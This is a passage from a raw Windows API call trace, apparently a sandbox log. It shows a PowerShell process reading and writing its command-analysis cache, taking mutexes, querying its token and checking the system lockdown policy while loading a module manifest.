lpNumberOfBytesWritten=0x653ef8d418*=0xb07, lpOverlapped=0x0) returned 1 [0229.685] CloseHandle (hObject=0x82c) returned 1 [0229.687] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfb080 [0229.687] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfb080 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0229.687] CoTaskMemFree (pv=0x25b73cfb080) [0229.687] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0229.687] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0229.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d370) returned 1 [0229.687] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d450 | out: lpFileInformation=0x653ef8d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0229.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0229.687] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0229.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d2b0) returned 1 [0229.688] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x82c [0229.688] GetFileType (hFile=0x82c) returned 0x1 [0229.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d220) returned 1 [0229.688] GetFileType (hFile=0x82c) returned 0x1 [0229.688] SetEndOfFile (hFile=0x82c) returned 1 [0229.689] WriteFile (in: hFile=0x82c, lpBuffer=0x25b5c1a7288*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8caf8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1a7288*, lpNumberOfBytesWritten=0x653ef8caf8*=0x1000, lpOverlapped=0x0) returned 1 [0229.691] WriteFile (in: hFile=0x82c, lpBuffer=0x25b5c1a7288*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8ccc8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1a7288*, lpNumberOfBytesWritten=0x653ef8ccc8*=0x1000, lpOverlapped=0x0) returned 1 [0229.691] WriteFile (in: hFile=0x82c, lpBuffer=0x25b5c1a7288*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8cc78, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1a7288*, lpNumberOfBytesWritten=0x653ef8cc78*=0x1000, lpOverlapped=0x0) returned 1 [0229.691] WriteFile (in: hFile=0x82c, lpBuffer=0x25b5c1a7288*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8caf8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1a7288*, lpNumberOfBytesWritten=0x653ef8caf8*=0x1000, lpOverlapped=0x0) returned 1 [0229.692] WriteFile (in: hFile=0x82c, lpBuffer=0x25b5c1a7288*, nNumberOfBytesToWrite=0xced, lpNumberOfBytesWritten=0x653ef8d3b8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1a7288*, lpNumberOfBytesWritten=0x653ef8d3b8*=0xced, lpOverlapped=0x0) returned 1 [0229.692] CloseHandle (hObject=0x82c) returned 1 [0229.694] ReleaseMutex (hMutex=0x828) returned 1 [0229.719] EtwEventActivityIdControl () returned 0x0 [0229.722] SetEvent (hEvent=0x7fc) returned 1 [0229.722] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8dcc0*=0x7fc, lpdwindex=0x653ef8da94 | out: lpdwindex=0x653ef8da94) returned 0x0 [0229.735] GetCurrentProcess () returned 0xffffffffffffffff [0229.735] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8df48 | out: TokenHandle=0x653ef8df48*=0x82c) returned 1 [0229.735] GetTokenInformation (in: TokenHandle=0x82c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8e048 | out: TokenInformation=0x0, ReturnLength=0x653ef8e048) returned 0 [0229.735] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739d1ed0 [0229.735] GetTokenInformation (in: TokenHandle=0x82c, TokenInformationClass=0x1, TokenInformation=0x25b739d1ed0, TokenInformationLength=0x2c, ReturnLength=0x653ef8e048 | out: TokenInformation=0x25b739d1ed0, ReturnLength=0x653ef8e048) returned 1 [0229.736] LocalFree (hMem=0x25b739d1ed0) returned 0x0 [0229.736] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c1bb300, cbSid=0x653ef8e040 | out: pSid=0x25b5c1bb300*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8e040) returned 1 [0229.737] CreateMutexW (lpMutexAttributes=0x25b5c1bb450, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x830 [0229.737] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8dee0*=0x830, lpdwindex=0x653ef8dcb4 | out: lpdwindex=0x653ef8dcb4) returned 0x0 [0229.737] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8da10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0229.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de60) returned 1 [0229.737] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df40 | out: lpFileInformation=0x653ef8df40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0229.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de20) returned 1 [0229.738] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0229.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dda0) returned 1 [0229.738] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x81c [0229.738] GetFileType (hFile=0x81c) returned 0x1 [0229.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd10) returned 1 [0229.738] GetFileType (hFile=0x81c) returned 0x1 [0229.738] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1bc518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dc08, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1bc518*, lpNumberOfBytesRead=0x653ef8dc08*=0x1000, lpOverlapped=0x0) returned 1 [0229.744] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1be2fa, nNumberOfBytesToRead=0x1f, lpNumberOfBytesRead=0x653ef8d8a8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1be2fa*, lpNumberOfBytesRead=0x653ef8d8a8*=0x1f, lpOverlapped=0x0) returned 1 [0229.744] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1bc518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d878, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1bc518*, lpNumberOfBytesRead=0x653ef8d878*=0x1000, lpOverlapped=0x0) returned 1 [0229.747] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1be2fc, nNumberOfBytesToRead=0x27, lpNumberOfBytesRead=0x653ef8d728, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1be2fc*, lpNumberOfBytesRead=0x653ef8d728*=0x27, lpOverlapped=0x0) returned 1 [0229.747] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1bc518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d7c8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1bc518*, lpNumberOfBytesRead=0x653ef8d7c8*=0x1000, lpOverlapped=0x0) returned 1 [0229.747] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1be2c8, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x653ef8d688, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1be2c8*, lpNumberOfBytesRead=0x653ef8d688*=0x5, lpOverlapped=0x0) returned 1 [0229.747] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1bc518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d728, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1bc518*, lpNumberOfBytesRead=0x653ef8d728*=0x1000, lpOverlapped=0x0) returned 1 [0229.748] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1be29a, nNumberOfBytesToRead=0x1d, lpNumberOfBytesRead=0x653ef8d838, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1be29a*, lpNumberOfBytesRead=0x653ef8d838*=0x1d, lpOverlapped=0x0) returned 1 [0229.748] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1bc518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d8d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1bc518*, lpNumberOfBytesRead=0x653ef8d8d8*=0xc85, lpOverlapped=0x0) returned 1 [0229.748] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1bc518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dbd8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1bc518*, lpNumberOfBytesRead=0x653ef8dbd8*=0x0, lpOverlapped=0x0) returned 1 [0229.748] CloseHandle (hObject=0x81c) returned 1 [0229.748] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8dba0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0229.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e030) returned 1 [0229.748] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c1c93b0 | out: lpFileInformation=0x25b5c1c93b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0229.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dff0) returned 1 [0229.749] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8dad0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0229.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8df20) returned 1 [0229.749] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e000 | out: lpFileInformation=0x653ef8e000*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0229.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dee0) returned 1 [0229.749] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", nBufferLength=0x105, lpBuffer=0x653ef8d980, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", lpFilePart=0x0) returned 0x93 [0229.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de60) returned 1 [0229.749] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_da21122d-ae44-4f93-ba1d-c9a978ca5b20"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x81c [0229.749] GetFileType (hFile=0x81c) returned 0x1 [0229.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ddd0) returned 1 [0229.749] GetFileType (hFile=0x81c) returned 0x1 [0229.749] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1ca6b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dcc8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1ca6b0*, lpNumberOfBytesRead=0x653ef8dcc8*=0x1000, lpOverlapped=0x0) returned 1 [0230.480] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1ca6b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d998, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1ca6b0*, lpNumberOfBytesRead=0x653ef8d998*=0x1000, lpOverlapped=0x0) returned 1 [0230.484] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1def2d, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x653ef8d628, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1def2d*, lpNumberOfBytesRead=0x653ef8d628*=0x5, lpOverlapped=0x0) returned 1 [0230.484] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1ca6b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d5f8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1ca6b0*, lpNumberOfBytesRead=0x653ef8d5f8*=0xb02, lpOverlapped=0x0) returned 1 [0230.502] ReadFile (in: hFile=0x81c, lpBuffer=0x25b5c1ca6b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dc98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1ca6b0*, lpNumberOfBytesRead=0x653ef8dc98*=0x0, lpOverlapped=0x0) returned 1 [0230.502] CloseHandle (hObject=0x81c) returned 1 [0230.502] ReleaseMutex (hMutex=0x830) returned 1 [0230.504] CoCreateGuid (in: pguid=0x653ef8e0f8 | out: pguid=0x653ef8e0f8*(Data1=0x8550f6ba, Data2=0x441c, Data3=0x4c31, Data4=([0]=0xa1, [1]=0x92, [2]=0x66, [3]=0x12, [4]=0x12, [5]=0x83, [6]=0x45, [7]=0x91))) returned 0x0 [0230.505] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x81c [0230.505] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x834 [0230.505] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x810 [0230.505] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x838 [0230.505] SetEvent (hEvent=0x838) returned 1 [0230.505] SetEvent (hEvent=0x81c) returned 1 [0230.505] SetEvent (hEvent=0x834) returned 1 [0230.505] SetEvent (hEvent=0x810) returned 1 [0230.506] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x83c [0230.506] SetThreadUILanguage (LangId=0x0) returned 0x409 [0230.593] EtwEventActivityIdControl () returned 0x0 [0230.593] EtwEventActivityIdControl () returned 0x0 [0230.593] EtwEventActivityIdControl () returned 0x0 [0230.848] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0230.851] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0230.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7f0) returned 1 [0230.851] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d8d0 | out: lpFileInformation=0x653ef8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0230.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7b0) returned 1 [0230.851] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0230.851] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8cf00, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0230.851] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d01240 [0230.851] GetSystemDirectoryW (in: lpBuffer=0x25b73d01240, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0230.851] CoTaskMemFree (pv=0x25b73d01240) [0230.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x653ef8cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0230.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d220) returned 1 [0230.851] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d300 | out: lpFileInformation=0x653ef8d300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0230.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d1e0) returned 1 [0230.852] WldpGetLockdownPolicy () returned 0x0 [0230.852] GetSystemInfo (in: lpSystemInfo=0x653ef8d360 | out: lpSystemInfo=0x653ef8d360*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0230.852] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8d268 | out: phkResult=0x653ef8d268*=0x840) returned 0x0 [0230.852] RegQueryValueExW (in: hKey=0x840, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x653ef8d2b8, lpData=0x0, lpcbData=0x653ef8d2b0*=0x0 | out: lpType=0x653ef8d2b8*=0x0, lpData=0x0, lpcbData=0x653ef8d2b0*=0x0) returned 0x2 [0230.852] RegCloseKey (hKey=0x840) returned 0x0 [0230.853] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8cc50, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0230.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d130) returned 1 [0230.853] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x840 [0230.853] GetFileType (hFile=0x840) returned 0x1 [0230.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d0a0) returned 1 [0230.853] GetFileType (hFile=0x840) returned 0x1 [0230.853] SetFilePointer (in: hFile=0x840, lDistanceToMove=0, lpDistanceToMoveHigh=0x653ef8d0e8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x653ef8d0e8*=0) returned 0x0 [0230.853] ReadFile (in: hFile=0x840, lpBuffer=0x25b5c23ca68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d168, lpOverlapped=0x0 | out: lpBuffer=0x25b5c23ca68*, lpNumberOfBytesRead=0x653ef8d168*=0x950, lpOverlapped=0x0) returned 1 [0230.854] SetFilePointer (in: hFile=0x840, lDistanceToMove=0, lpDistanceToMoveHigh=0x653ef8d0e8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x653ef8d0e8*=0) returned 0x950 [0230.854] ReadFile (in: hFile=0x840, lpBuffer=0x25b5c23bf20, nNumberOfBytesToRead=0x2b0, lpNumberOfBytesRead=0x653ef8d168, lpOverlapped=0x0 | out: lpBuffer=0x25b5c23bf20*, lpNumberOfBytesRead=0x653ef8d168*=0x0, lpOverlapped=0x0) returned 1 [0230.854] SetFilePointer (in: hFile=0x840, lDistanceToMove=0, lpDistanceToMoveHigh=0x653ef8d0e8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x653ef8d0e8*=0) returned 0x950 [0230.854] ReadFile (in: hFile=0x840, lpBuffer=0x25b5c23ca68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d168, lpOverlapped=0x0 | out: lpBuffer=0x25b5c23ca68*, lpNumberOfBytesRead=0x653ef8d168*=0x0, lpOverlapped=0x0) returned 1 [0230.854] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cff260 [0230.854] GetSystemDirectoryW (in: lpBuffer=0x25b73cff260, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0230.854] CoTaskMemFree (pv=0x25b73cff260) [0230.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x653ef8cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0230.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d080) returned 1 [0230.855] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, 